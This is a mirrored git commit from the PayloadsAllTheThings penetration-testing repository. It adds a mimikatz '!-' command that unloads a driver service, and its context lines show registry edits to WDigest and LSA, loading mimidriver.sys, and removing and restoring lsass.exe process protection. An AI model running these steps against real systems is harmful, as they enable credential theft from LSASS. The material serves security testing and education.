mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Unload the service mimi
This commit is contained in:
parent
9be371d793
commit
d1c23c5863
1 changed files with 4 additions and 1 deletions
|
@ -67,7 +67,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
||||||
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
|
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
|
||||||
|
|
||||||
# Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
|
# Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
|
||||||
#Now lets import the mimidriver.sys to the system
|
# Now lets import the mimidriver.sys to the system
|
||||||
mimikatz # !+
|
mimikatz # !+
|
||||||
|
|
||||||
# Now lets remove the protection flags from lsass.exe process
|
# Now lets remove the protection flags from lsass.exe process
|
||||||
|
@ -80,6 +80,9 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
||||||
|
|
||||||
# Now lets re-add the protection flags to the lsass.exe process
|
# Now lets re-add the protection flags to the lsass.exe process
|
||||||
mimikatz # !processprotect /process:lsass.exe
|
mimikatz # !processprotect /process:lsass.exe
|
||||||
|
|
||||||
|
# Unload the service created
|
||||||
|
mimikatz # !-
|
||||||
```
|
```
|
||||||
|
|
||||||
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
|
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
|
||||||
|
|
Loading…
Reference in a new issue